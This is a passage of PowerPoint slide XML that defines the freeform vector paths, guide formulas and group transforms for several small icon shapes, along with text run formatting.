                  <a:gd name="T3" fmla="*/ 161 h 164"/>
                  <a:gd name="T4" fmla="*/ 14 w 168"/>
                  <a:gd name="T5" fmla="*/ 103 h 164"/>
                  <a:gd name="T6" fmla="*/ 0 w 168"/>
                  <a:gd name="T7" fmla="*/ 80 h 164"/>
                  <a:gd name="T8" fmla="*/ 14 w 168"/>
                  <a:gd name="T9" fmla="*/ 57 h 164"/>
                  <a:gd name="T10" fmla="*/ 113 w 168"/>
                  <a:gd name="T11" fmla="*/ 6 h 164"/>
                  <a:gd name="T12" fmla="*/ 148 w 168"/>
                  <a:gd name="T13" fmla="*/ 18 h 164"/>
                  <a:gd name="T14" fmla="*/ 137 w 168"/>
                  <a:gd name="T15" fmla="*/ 53 h 164"/>
                  <a:gd name="T16" fmla="*/ 82 w 168"/>
                  <a:gd name="T17" fmla="*/ 80 h 164"/>
                  <a:gd name="T18" fmla="*/ 150 w 168"/>
                  <a:gd name="T19" fmla="*/ 115 h 164"/>
                  <a:gd name="T20" fmla="*/ 162 w 168"/>
                  <a:gd name="T21" fmla="*/ 150 h 164"/>
                  <a:gd name="T22" fmla="*/ 139 w 168"/>
                  <a:gd name="T23"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64">
                    <a:moveTo>
                      <a:pt x="139" y="164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="135" y="164"/>
                      <a:pt x="131" y="163"/>
                      <a:pt x="127" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="103"/>
                      <a:pt x="14" y="103"/>
                      <a:pt x="14" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="99"/>
                      <a:pt x="0" y="90"/>
                      <a:pt x="0" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="70"/>
                      <a:pt x="5" y="62"/>
                      <a:pt x="14" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="6"/>
                      <a:pt x="113" y="6"/>
                      <a:pt x="113" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="0"/>
                      <a:pt x="141" y="5"/>
                      <a:pt x="148" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="154" y="31"/>
                      <a:pt x="149" y="46"/>
                      <a:pt x="137" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="80"/>
                      <a:pt x="82" y="80"/>
                      <a:pt x="82" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="115"/>
                      <a:pt x="150" y="115"/>
                      <a:pt x="150" y="115"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="121"/>
                      <a:pt x="168" y="137"/>
                      <a:pt x="162" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="159"/>
                      <a:pt x="148" y="164"/>
                      <a:pt x="13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150" name="Freeform 785">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{625FA805-6F47-8D41-AED4-2FCD914ACB7A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1827155" y="5850059"/>
                <a:ext cx="68473" cy="29482"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 132 w 285"/>
                  <a:gd name="T1" fmla="*/ 123 h 123"/>
                  <a:gd name="T2" fmla="*/ 119 w 285"/>
                  <a:gd name="T3" fmla="*/ 119 h 123"/>
                  <a:gd name="T4" fmla="*/ 16 w 285"/>
                  <a:gd name="T5" fmla="*/ 59 h 123"/>
                  <a:gd name="T6" fmla="*/ 7 w 285"/>
                  <a:gd name="T7" fmla="*/ 23 h 123"/>
                  <a:gd name="T8" fmla="*/ 42 w 285"/>
                  <a:gd name="T9" fmla="*/ 14 h 123"/>
                  <a:gd name="T10" fmla="*/ 133 w 285"/>
                  <a:gd name="T11" fmla="*/ 67 h 123"/>
                  <a:gd name="T12" fmla="*/ 243 w 285"/>
                  <a:gd name="T13" fmla="*/ 7 h 123"/>
                  <a:gd name="T14" fmla="*/ 278 w 285"/>
                  <a:gd name="T15" fmla="*/ 17 h 123"/>
                  <a:gd name="T16" fmla="*/ 268 w 285"/>
                  <a:gd name="T17" fmla="*/ 52 h 123"/>
                  <a:gd name="T18" fmla="*/ 144 w 285"/>
                  <a:gd name="T19" fmla="*/ 120 h 123"/>
                  <a:gd name="T20" fmla="*/ 132 w 285"/>
                  <a:gd name="T21"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5" h="123">
                    <a:moveTo>
                      <a:pt x="132" y="123"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="123"/>
                      <a:pt x="123" y="122"/>
                      <a:pt x="119" y="119"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="59"/>
                      <a:pt x="16" y="59"/>
                      <a:pt x="16" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="51"/>
                      <a:pt x="0" y="35"/>
                      <a:pt x="7" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="11"/>
                      <a:pt x="30" y="7"/>
                      <a:pt x="42" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="67"/>
                      <a:pt x="133" y="67"/>
                      <a:pt x="133" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="243" y="7"/>
                      <a:pt x="243" y="7"/>
                      <a:pt x="243" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="255" y="0"/>
                      <a:pt x="271" y="5"/>
                      <a:pt x="278" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="285" y="30"/>
                      <a:pt x="280" y="46"/>
                      <a:pt x="268" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="120"/>
                      <a:pt x="144" y="120"/>
                      <a:pt x="144" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="122"/>
                      <a:pt x="136" y="123"/>
                      <a:pt x="132"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151" name="Freeform 786">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8D32BBD-4E98-4447-A512-6F4670046F37}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1781506" y="5792047"/>
                <a:ext cx="32335" cy="55159"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 109 w 138"/>
                  <a:gd name="T1" fmla="*/ 231 h 231"/>
                  <a:gd name="T2" fmla="*/ 94 w 138"/>
                  <a:gd name="T3" fmla="*/ 227 h 231"/>
                  <a:gd name="T4" fmla="*/ 11 w 138"/>
                  <a:gd name="T5" fmla="*/ 170 h 231"/>
                  <a:gd name="T6" fmla="*/ 0 w 138"/>
                  <a:gd name="T7" fmla="*/ 148 h 231"/>
                  <a:gd name="T8" fmla="*/ 0 w 138"/>
                  <a:gd name="T9" fmla="*/ 26 h 231"/>
                  <a:gd name="T10" fmla="*/ 26 w 138"/>
                  <a:gd name="T11" fmla="*/ 0 h 231"/>
                  <a:gd name="T12" fmla="*/ 26 w 138"/>
                  <a:gd name="T13" fmla="*/ 0 h 231"/>
                  <a:gd name="T14" fmla="*/ 52 w 138"/>
                  <a:gd name="T15" fmla="*/ 26 h 231"/>
                  <a:gd name="T16" fmla="*/ 52 w 138"/>
                  <a:gd name="T17" fmla="*/ 135 h 231"/>
                  <a:gd name="T18" fmla="*/ 124 w 138"/>
                  <a:gd name="T19" fmla="*/ 184 h 231"/>
                  <a:gd name="T20" fmla="*/ 130 w 138"/>
                  <a:gd name="T21" fmla="*/ 220 h 231"/>
                  <a:gd name="T22" fmla="*/ 109 w 138"/>
                  <a:gd name="T2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231">
                    <a:moveTo>
                      <a:pt x="109" y="231"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="231"/>
                      <a:pt x="99" y="230"/>
                      <a:pt x="94" y="227"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="170"/>
                      <a:pt x="11" y="170"/>
                      <a:pt x="11" y="170"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="165"/>
                      <a:pt x="0" y="157"/>
                      <a:pt x="0" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="26"/>
                      <a:pt x="0" y="26"/>
                      <a:pt x="0" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="12"/>
                      <a:pt x="11" y="0"/>
                      <a:pt x="26" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="0"/>
                      <a:pt x="26" y="0"/>
                      <a:pt x="26" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="0"/>
                      <a:pt x="51" y="12"/>
                      <a:pt x="52" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="135"/>
                      <a:pt x="52" y="135"/>
                      <a:pt x="52" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="184"/>
                      <a:pt x="124" y="184"/>
                      <a:pt x="124" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="135" y="192"/>
                      <a:pt x="138" y="208"/>
                      <a:pt x="130" y="220"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="227"/>
                      <a:pt x="117" y="231"/>
                      <a:pt x="109" y="2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152" name="Freeform 787">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8B744E7-2CD9-504D-B798-98DCB9E82A79}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1829057" y="5757810"/>
                <a:ext cx="60865" cy="25678"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 123 w 256"/>
                  <a:gd name="T1" fmla="*/ 111 h 111"/>
                  <a:gd name="T2" fmla="*/ 112 w 256"/>
                  <a:gd name="T3" fmla="*/ 108 h 111"/>
                  <a:gd name="T4" fmla="*/ 17 w 256"/>
                  <a:gd name="T5" fmla="*/ 60 h 111"/>
                  <a:gd name="T6" fmla="*/ 6 w 256"/>
                  <a:gd name="T7" fmla="*/ 25 h 111"/>
                  <a:gd name="T8" fmla="*/ 41 w 256"/>
                  <a:gd name="T9" fmla="*/ 14 h 111"/>
                  <a:gd name="T10" fmla="*/ 123 w 256"/>
                  <a:gd name="T11" fmla="*/ 56 h 111"/>
                  <a:gd name="T12" fmla="*/ 215 w 256"/>
                  <a:gd name="T13" fmla="*/ 7 h 111"/>
                  <a:gd name="T14" fmla="*/ 250 w 256"/>
                  <a:gd name="T15" fmla="*/ 17 h 111"/>
                  <a:gd name="T16" fmla="*/ 239 w 256"/>
                  <a:gd name="T17" fmla="*/ 52 h 111"/>
                  <a:gd name="T18" fmla="*/ 136 w 256"/>
                  <a:gd name="T19" fmla="*/ 108 h 111"/>
                  <a:gd name="T20" fmla="*/ 123 w 256"/>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6" h="111">
                    <a:moveTo>
                      <a:pt x="123" y="111"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="111"/>
                      <a:pt x="115" y="110"/>
                      <a:pt x="112" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="60"/>
                      <a:pt x="17" y="60"/>
                      <a:pt x="17" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="53"/>
                      <a:pt x="0" y="38"/>
                      <a:pt x="6" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="12"/>
                      <a:pt x="28" y="7"/>
                      <a:pt x="41" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="56"/>
                      <a:pt x="123" y="56"/>
                      <a:pt x="123" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="215" y="7"/>
                      <a:pt x="215" y="7"/>
                      <a:pt x="215" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="227" y="0"/>
                      <a:pt x="243" y="5"/>
                      <a:pt x="250" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="256" y="30"/>
                      <a:pt x="252" y="46"/>
                      <a:pt x="239" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="108"/>
                      <a:pt x="136" y="108"/>
                      <a:pt x="136" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="110"/>
                      <a:pt x="128" y="111"/>
                      <a:pt x="123"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sp>
            <p:nvSpPr>
              <p:cNvPr id="153" name="Freeform 789">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B48B455-FF71-F64C-A85D-C3486A053A5F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1852832" y="5836745"/>
                <a:ext cx="12364" cy="39943"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 26 w 52"/>
                  <a:gd name="T1" fmla="*/ 166 h 166"/>
                  <a:gd name="T2" fmla="*/ 0 w 52"/>
                  <a:gd name="T3" fmla="*/ 140 h 166"/>
                  <a:gd name="T4" fmla="*/ 0 w 52"/>
                  <a:gd name="T5" fmla="*/ 25 h 166"/>
                  <a:gd name="T6" fmla="*/ 26 w 52"/>
                  <a:gd name="T7" fmla="*/ 0 h 166"/>
                  <a:gd name="T8" fmla="*/ 52 w 52"/>
                  <a:gd name="T9" fmla="*/ 25 h 166"/>
                  <a:gd name="T10" fmla="*/ 52 w 52"/>
                  <a:gd name="T11" fmla="*/ 140 h 166"/>
                  <a:gd name="T12" fmla="*/ 26 w 52"/>
                  <a:gd name="T13" fmla="*/ 166 h 166"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T10" y="T11"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T12" y="T13"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="52" h="166">
                    <a:moveTo>
                      <a:pt x="26" y="166"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="166"/>
                      <a:pt x="0" y="154"/>
                      <a:pt x="0" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="25"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="0" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="11"/>
                      <a:pt x="12" y="0"/>
                      <a:pt x="26" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="0"/>
                      <a:pt x="52" y="11"/>
                      <a:pt x="52" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="140"/>
                      <a:pt x="52" y="140"/>
                      <a:pt x="52" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="154"/>
                      <a:pt x="40" y="166"/>
                      <a:pt x="26"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1790" tIns="20895" rIns="41790" bIns="20895"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962" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Tahoma"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="154" name="Group 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E28D29E5-E84E-724C-B1BA-4416987EEC1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3395199" y="1884054"/>
            <a:ext cx="337130" cy="385684"/>
            <a:chOff x="13690601" y="885826"/>
            <a:chExt cx="584200" cy="668338"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="155" name="Freeform 212">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35FFA563-BB7B-9440-A48F-53139FBD7317}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="13974764" y="1119188"/>
              <a:ext cx="114300" cy="434975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 195 w 276"/>
                <a:gd name="T1" fmla="*/ 1048 h 1048"/>
                <a:gd name="T2" fmla="*/ 25 w 276"/>
                <a:gd name="T3" fmla="*/ 1048 h 1048"/>
                <a:gd name="T4" fmla="*/ 0 w 276"/>
                <a:gd name="T5" fmla="*/ 1023 h 1048"/>
                <a:gd name="T6" fmla="*/ 25 w 276"/>
                <a:gd name="T7" fmla="*/ 998 h 1048"/>
                <a:gd name="T8" fmla="*/ 170 w 276"/>
                <a:gd name="T9" fmla="*/ 998 h 1048"/>
                <a:gd name="T10" fmla="*/ 170 w 276"/>
                <a:gd name="T11" fmla="*/ 55 h 1048"/>
                <a:gd name="T12" fmla="*/ 183 w 276"/>
                <a:gd name="T13" fmla="*/ 32 h 1048"/>
                <a:gd name="T14" fmla="*/ 236 w 276"/>
                <a:gd name="T15" fmla="*/ 6 h 1048"/>
                <a:gd name="T16" fmla="*/ 269 w 276"/>
                <a:gd name="T17" fmla="*/ 17 h 1048"/>
                <a:gd name="T18" fmla="*/ 258 w 276"/>
                <a:gd name="T19" fmla="*/ 51 h 1048"/>
                <a:gd name="T20" fmla="*/ 220 w 276"/>
                <a:gd name="T21" fmla="*/ 70 h 1048"/>
                <a:gd name="T22" fmla="*/ 220 w 276"/>
                <a:gd name="T23" fmla="*/ 1023 h 1048"/>
                <a:gd name="T24" fmla="*/ 195 w 276"/>
                <a:gd name="T25"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1048">
                  <a:moveTo>
                    <a:pt x="195" y="1048"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="1048"/>
                    <a:pt x="25" y="1048"/>
                    <a:pt x="25" y="1048"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="1048"/>
                    <a:pt x="0" y="1037"/>
                    <a:pt x="0" y="1023"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1009"/>
                    <a:pt x="11" y="998"/>
                    <a:pt x="25" y="998"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="998"/>
                    <a:pt x="170" y="998"/>
                    <a:pt x="170" y="998"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="55"/>
                    <a:pt x="170" y="55"/>
                    <a:pt x="170" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="45"/>
                    <a:pt x="175" y="37"/>
                    <a:pt x="183" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="6"/>
                    <a:pt x="236" y="6"/>
                    <a:pt x="236" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="0"/>
                    <a:pt x="263" y="5"/>
                    <a:pt x="269" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="276" y="30"/>
                    <a:pt x="271" y="45"/>
                    <a:pt x="258" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="70"/>
                    <a:pt x="220" y="70"/>
                    <a:pt x="220" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="1023"/>
                    <a:pt x="220" y="1023"/>
                    <a:pt x="220" y="1023"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="1037"/>
                    <a:pt x="209" y="1048"/>
                    <a:pt x="195" y="10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56" name="Freeform 213">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D407B17-FE0F-2941-B44F-110AD4BDDE47}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="13877926" y="1119188"/>
              <a:ext cx="117475" cy="434975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 257 w 282"/>
                <a:gd name="T1" fmla="*/ 1048 h 1048"/>
                <a:gd name="T2" fmla="*/ 88 w 282"/>
                <a:gd name="T3" fmla="*/ 1048 h 1048"/>
                <a:gd name="T4" fmla="*/ 63 w 282"/>
                <a:gd name="T5" fmla="*/ 1023 h 1048"/>
                <a:gd name="T6" fmla="*/ 63 w 282"/>
                <a:gd name="T7" fmla="*/ 71 h 1048"/>
                <a:gd name="T8" fmla="*/ 18 w 282"/>
                <a:gd name="T9" fmla="*/ 51 h 1048"/>
                <a:gd name="T10" fmla="*/ 5 w 282"/>
                <a:gd name="T11" fmla="*/ 18 h 1048"/>
                <a:gd name="T12" fmla="*/ 38 w 282"/>
                <a:gd name="T13" fmla="*/ 6 h 1048"/>
                <a:gd name="T14" fmla="*/ 98 w 282"/>
                <a:gd name="T15" fmla="*/ 32 h 1048"/>
                <a:gd name="T16" fmla="*/ 113 w 282"/>
                <a:gd name="T17" fmla="*/ 55 h 1048"/>
                <a:gd name="T18" fmla="*/ 113 w 282"/>
                <a:gd name="T19" fmla="*/ 998 h 1048"/>
                <a:gd name="T20" fmla="*/ 232 w 282"/>
                <a:gd name="T21" fmla="*/ 998 h 1048"/>
                <a:gd name="T22" fmla="*/ 232 w 282"/>
                <a:gd name="T23" fmla="*/ 516 h 1048"/>
                <a:gd name="T24" fmla="*/ 257 w 282"/>
                <a:gd name="T25" fmla="*/ 491 h 1048"/>
                <a:gd name="T26" fmla="*/ 282 w 282"/>
                <a:gd name="T27" fmla="*/ 516 h 1048"/>
                <a:gd name="T28" fmla="*/ 282 w 282"/>
                <a:gd name="T29" fmla="*/ 1023 h 1048"/>
                <a:gd name="T30" fmla="*/ 257 w 282"/>
                <a:gd name="T31"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2" h="1048">
                  <a:moveTo>
                    <a:pt x="257" y="1048"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="1048"/>
                    <a:pt x="88" y="1048"/>
                    <a:pt x="88" y="1048"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="1048"/>
                    <a:pt x="63" y="1037"/>
                    <a:pt x="63" y="1023"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="71"/>
                    <a:pt x="63" y="71"/>
                    <a:pt x="63" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="51"/>
                    <a:pt x="18" y="51"/>
                    <a:pt x="18" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="46"/>
                    <a:pt x="0" y="31"/>
                    <a:pt x="5" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="6"/>
                    <a:pt x="26" y="0"/>
                    <a:pt x="38" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="32"/>
                    <a:pt x="98" y="32"/>
                    <a:pt x="98" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="36"/>
                    <a:pt x="113" y="45"/>
                    <a:pt x="113" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="998"/>
                    <a:pt x="113" y="998"/>
                    <a:pt x="113" y="998"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="998"/>
                    <a:pt x="232" y="998"/>
                    <a:pt x="232" y="998"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="516"/>
                    <a:pt x="232" y="516"/>
                    <a:pt x="232" y="516"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="502"/>
                    <a:pt x="243" y="491"/>
                    <a:pt x="257" y="491"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="271" y="491"/>
                    <a:pt x="282" y="502"/>
                    <a:pt x="282" y="516"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="1023"/>
                    <a:pt x="282" y="1023"/>
                    <a:pt x="282" y="1023"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="1037"/>
                    <a:pt x="271" y="1048"/>
                    <a:pt x="257" y="10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57" name="Freeform 214">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ECD98CE-2D0B-DD42-9ADC-FFF464D27743}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="13920789" y="885826"/>
              <a:ext cx="131763" cy="146050"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 158 w 315"/>
                <a:gd name="T1" fmla="*/ 352 h 352"/>
                <a:gd name="T2" fmla="*/ 0 w 315"/>
                <a:gd name="T3" fmla="*/ 195 h 352"/>
                <a:gd name="T4" fmla="*/ 0 w 315"/>
                <a:gd name="T5" fmla="*/ 157 h 352"/>
                <a:gd name="T6" fmla="*/ 24 w 315"/>
                <a:gd name="T7" fmla="*/ 75 h 352"/>
                <a:gd name="T8" fmla="*/ 58 w 315"/>
                <a:gd name="T9" fmla="*/ 67 h 352"/>
                <a:gd name="T10" fmla="*/ 66 w 315"/>
                <a:gd name="T11" fmla="*/ 101 h 352"/>
                <a:gd name="T12" fmla="*/ 50 w 315"/>
                <a:gd name="T13" fmla="*/ 157 h 352"/>
                <a:gd name="T14" fmla="*/ 50 w 315"/>
                <a:gd name="T15" fmla="*/ 195 h 352"/>
                <a:gd name="T16" fmla="*/ 158 w 315"/>
                <a:gd name="T17" fmla="*/ 302 h 352"/>
                <a:gd name="T18" fmla="*/ 265 w 315"/>
